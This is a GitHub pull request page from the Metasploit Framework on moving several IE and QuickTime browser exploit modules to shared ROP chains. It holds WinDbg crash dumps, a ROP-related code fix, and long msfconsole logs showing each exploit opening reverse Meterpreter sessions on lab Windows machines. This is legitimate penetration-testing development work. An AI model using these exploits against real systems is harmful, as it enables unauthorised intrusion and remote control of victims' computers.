Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[SeeRM 8458] Use RopDb mixin for browser exploits #2483

Merged
merged 6 commits into from Oct 9, 2013
Merged

[SeeRM 8458] Use RopDb mixin for browser exploits #2483

merged 6 commits into from Oct 9, 2013

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Oct 7, 2013

These browser exploits should be using ROP chains from RopDb. All the targets should be tested except for Windows Vista.

@wchen-r7
Use RopDb msvcrt ROP chain. Tested all targets.
e016c9a
@wchen-r7
Use RopDb for ie_cbutton_uaf.
aea6313 
All targets tested except for Vista. Will need additional testing
during review.
@wchen-r7
Use RopDb for ie_cgenericelement_uaf.
67228ba 
All targets tested except for Vista, so additional testing will need
to be done during review.
@wchen-r7
Use RopDb for ms13_055_canchor.
7222e3c 
All targets tested.
@wchen-r7
Use RopDb for ms13_069
f4000d3 
Target tested
@jvazquez-r7
Copy link
Contributor

Start to work on testing all these modules!

@todb
Copy link
Contributor

todb commented Oct 9, 2013

By the way, @wchen-r7, if you want to link this change to a redmine ticket,
you need to use the SeeRM keyword in the commit description (or merge
commit, @jvazquez-r7), not the PR description. Redmine doesn't watch pulls,
just commits.

@jvazquez-r7
Copy link
Contributor

Will have into account!

@jvazquez-r7
Copy link
Contributor

While testing IE8 / Win XP SP3 / msvcrt rop chain I'm getting this crash consistently with ie_cgenericelement_uaf. I've not been able to get any session on several tries:

0:028> g
ModLoad: 73940000 73a10000   C:\WINDOWS\system32\D3DIM700.DLL
ModLoad: 08ed0000 08f69000   C:\WINDOWS\system32\mstime.dll
(7a8.714): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000eb9d ecx=06e0e0dc edx=d2043f85 esi=77c2aacc edi=77c39f92
eip=06e0e147 esp=06e0e13c ebp=77c11120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
06e0e147 0223            add     ah,byte ptr [ebx]          ds:0023:0000eb9d=??
0:008> dd esp
06e0e13c  06e0e13c 0000001b 0201db38 ffff0023
06e0e14c  31fcef83 57031557 f8ca6715 0135ee3a
06e0e15c  e4bc90bb 6ddb828a 20af12be d0fdd933
06e0e16c  d629afc0 d90c0561 b590a872 c46cabb1
06e0e17c  074c0be5 7a894af8 f0421ef3 44e78ea6
06e0e18c  c327af7b 1442d7c3 454c6db7 7d06fa68
06e0e19c  7cb6a402 378bb7c7 c67f036c f8805aa4
06e0e1ac  34bf3088 f3874905 07f33cf6 7ac0468a
0:008> kb 2
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
77c11120 00000000 7c80ba61 7c80cd27 7c812fc9 0x6e0e147

@wchen-r7 , could you confirm if it's working/crashing for you on the described test case?

@wchen-r7
Copy link
Contributor Author

wchen-r7 commented Oct 9, 2013

Yeah I tested that in this commit: 67228ba

If you switch back to upstream-master, does the exploit still work for you?

@jvazquez-r7
Copy link
Contributor

checking right now! :)

@jvazquez-r7
Copy link
Contributor

Working from master:

Juans-MacBook-Pro:metasploit-framework juan$ git checkout master
git feSwitched to branch 'master'
Juans-MacBook-Pro:metasploit-framework juan$ git fetch upstream
git rebase upstream/masterremote: Counting objects: 35, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 16 (delta 13), reused 16 (delta 13)
Unpacking objects: 100% (16/16), done.

From github:rapid7/metasploit-framework
   10cb0af..dfb0b11  refs/pull/2484/head -> upstream/pr/2484
 * [new ref]         refs/pull/2492/head -> upstream/pr/2492
 * [new tag]         sprint-C04 -> sprint-C04
Juans-MacBook-Pro:metasploit-framework juan$ git rebase upstream/master
giCurrent branch master is up to date.
Juans-MacBook-Pro:metasploit-framework juan$ git push origin master
./msfEverything up-to-date
Juans-MacBook-Pro:metasploit-framework juan$ ./msfconsole
Could not find rake-10.1.0 in any of the sources
Run `bundle install` to install missing gems.
Juans-MacBook-Pro:metasploit-framework juan$ rvm gemset use metasploit
Using ruby-1.9.3-p194 with gemset metasploit
Juans-MacBook-Pro:metasploit-framework juan$ ./msfconsole

blahblahblah

msf > use exploit/windows/browser/ie_cgenericelement_uaf 
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/Abkk2oENc7aKrkx
[*]  Local IP: http://10.6.0.165:8080/Abkk2oENc7aKrkx
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /Abkk2oENc7aKrkx
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49396) at 2013-10-09 10:57:46 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49396) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2320)
[*] Spawning notepad.exe process to migrate to

@jvazquez-r7
Copy link
Contributor

  • Also failing ie_cgenericelement_uaf on Win2003SP2 / IE8
(6f8.168): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000500 ecx=037660dc edx=7c8285ec esi=77e41fe3 edi=77bd8c05
eip=0376613e esp=03766134 ebp=77be2265 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
0376613e 0802            or      byte ptr [edx],al          ds:0023:7c8285ec=c3
0:008> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
77be2265 00000000 0824448b dd1fe8c1 ba514005 0x376613e
0:008> dd esp
03766134  03766138 0000001b 0208db28 ffff0023
03766144  49b1c931 83195e31 5e03fcee 3289ce15
03766154  cb728765 2efbf776 3b9f2547 6eebf9fa
03766164  9ab972f7 ac16f68c 8340bc25 4f4d71b6
03766174  92311074 5d08f2a9 804df3bc ce06a14f
03766184  922255e2 98e4543e 5f812e7f 8f88840b
03766194  37c393a4 46f3fbce 01cf1803 93bbea28
037661a4  a24323f8 0a7aefc4 adbbeec9 cdb78532
0:008> dd esp -20
03766114  00000040 77bef001 77be2265 77be2265
03766124  03766138 ffff027f ffff4041 ffffffbe
03766134  03766138 0000001b 0208db28 ffff0023
03766144  49b1c931 83195e31 5e03fcee 3289ce15
03766154  cb728765 2efbf776 3b9f2547 6eebf9fa
03766164  9ab972f7 ac16f68c 8340bc25 4f4d71b6
03766174  92311074 5d08f2a9 804df3bc ce06a14f
03766184  922255e2 98e4543e 5f812e7f 8f88840b

@jvazquez-r7
Copy link
Contributor

Full tests results here: https://gist.github.com/jvazquez-r7/6903913 Available at the end of this pr

The only exploit not working is ie_cgenericelement_uaf for Win XP SP3 and Win2003 SP2 / IE8 / msvcrt.

jvazquez-r7
jvazquez-r7 reviewed Oct 9, 2013
View reviewed changes
modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")

rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it should be:

        rop_payload = generate_rop_payload('msvcrt', align + p, {'target'=>'xp'})

@jvazquez-r7
Copy link
Contributor

cool! last test and hopefully landing!

@jvazquez-r7
Copy link
Contributor

ie_cgenericelement_uaf working again, on both WXPSP3 and W2003SP2

Landing!

Full testing results:

  • Windows XP SP3 - msvcrt
  • apple_quicktime_rdrf
msf exploit(apple_quicktime_rdrf) > [*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf/KALp.mov
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Sending specially crafted .mov file
[*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf/KALp.mov
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Sending specially crafted .mov file
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51486) at 2013-10-09 09:19:12 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51486) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3336)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 932
[+] Successfully migrated to process 

msf exploit(apple_quicktime_rdrf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 1 closed.  Reason: User exit
  • ms13_069_caret
msf exploit(ms13_069_caret) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/73uMjZTXrYt
[*]  Local IP: http://192.168.0.3:8080/73uMjZTXrYt
[*] Server started.
msf exploit(ms13_069_caret) > [*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51566) at 2013-10-09 09:23:23 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51566) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2384)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2608
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
  • ms13_055_canchor
msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/pcbfzIZP
[*]  Local IP: http://192.168.0.3:8080/pcbfzIZP
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:51573) at 2013-10-09 09:24:47 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:51573) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3588)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 320

msf exploit(ms13_055_canchor) > sessio[+] Successfully migrated to process 
ns -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 2 closed.  Reason: User exit
  • ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/FuFUWZ9OLiArJ
[*]  Local IP: http://10.6.0.165:8080/FuFUWZ9OLiArJ
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /FuFUWZ9OLiArJ
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:55369) at 2013-10-09 14:23:48 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:55369) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2316)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3392
[+] Successfully migrated to process 

msf exploit(ie_cgenericelement_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/djNjEKeOv
[*]  Local IP: http://192.168.0.3:8080/djNjEKeOv
[*] Server started.
msf exploit(ie_cbutton_uaf) > [*] 192.168.0.3      ie_cbutton_uaf - Requesting: /djNjEKeOv
[*] 192.168.0.3      ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:51788) at 2013-10-09 09:32:55 -0500
[*] Session ID 3 (192.168.0.3:4444 -> 192.168.0.3:51788) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (340)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2084

msf exploit(ie_cbutton_uaf) > sess[+] Successfully migrated to process 
ions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 3 closed.  Reason: User exit

Windows 7 SP1 - IE8 - msvcr71

  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/qso8LANa
[*]  Local IP: http://192.168.0.3:8080/qso8LANa
[*] Server started.
msf exploit(ie_cbutton_uaf) > [*] 192.168.0.3      ie_cbutton_uaf - Requesting: /qso8LANa
[*] 192.168.0.3      ie_cbutton_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.3      ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 4 opened (192.168.0.3:4444 -> 192.168.0.3:51867) at 2013-10-09 09:36:42 -0500
[*] Session ID 4 (192.168.0.3:4444 -> 192.168.0.3:51867) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2960)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3144
[+] Successfully migrated to process 

msf exploit(ie_cbutton_uaf) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
smeterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit
  • ms13_055_canchor
msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/yllhgcUaFdyrnTy
[*]  Local IP: http://192.168.0.3:8080/yllhgcUaFdyrnTy
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using JRE ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 5 opened (192.168.0.3:4444 -> 192.168.0.3:51875) at 2013-10-09 09:37:58 -0500
[*] Session ID 5 (192.168.0.3:4444 -> 192.168.0.3:51875) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3964)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1216
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

Windows 2003 SP2 - IE8 - msvcrt

  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/CKI0db
[*]  Local IP: http://10.6.0.165:8080/CKI0db
[*] Server started.
msf exploit(ie_cbutton_uaf) > rexp[*] 10.6.0.165       ie_cbutton_uaf - Requesting: /CKI0db
[*] 10.6.0.165       ie_cbutton_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49523) at 2013-10-09 11:14:43 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49523) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3564)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3716
[+] Successfully migrated to process 

[-] Unknown command: rexp.
msf exploit(ie_cbutton_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-6ED9DB6CA9\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA9
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
  • ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/1pvGZ2
[*]  Local IP: http://10.6.0.165:8080/1pvGZ2
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /1pvGZ2
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:55436) at 2013-10-09 14:27:16 -0500
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] 10.6.0.165 - Meterpreter session 2 closed.  Reason: Died

msf exploit(ie_cgenericelement_uaf) > 
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /1pvGZ2
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:55440) at 2013-10-09 14:27:27 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:55440) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3012)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3156
[+] Successfully migrated to process 

msf exploit(ie_cgenericelement_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
sServer username: JUAN-6ED9DB6CA9\Administrator
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA9
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(ie_cgenericelement_uaf) >

jvazquez-r7 pushed a commit that referenced this pull request Oct 9, 2013
Land #2483, @wchen-r7's patch for [SeeRM #8458]
4fd599b
@jvazquez-r7 jvazquez-r7 merged commit 1e3b84d into rapid7:master Oct 9, 2013
@wchen-r7 wchen-r7 deleted the browser_rop_update branch August 22, 2016 16:22
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @jvazquez-r7 @todb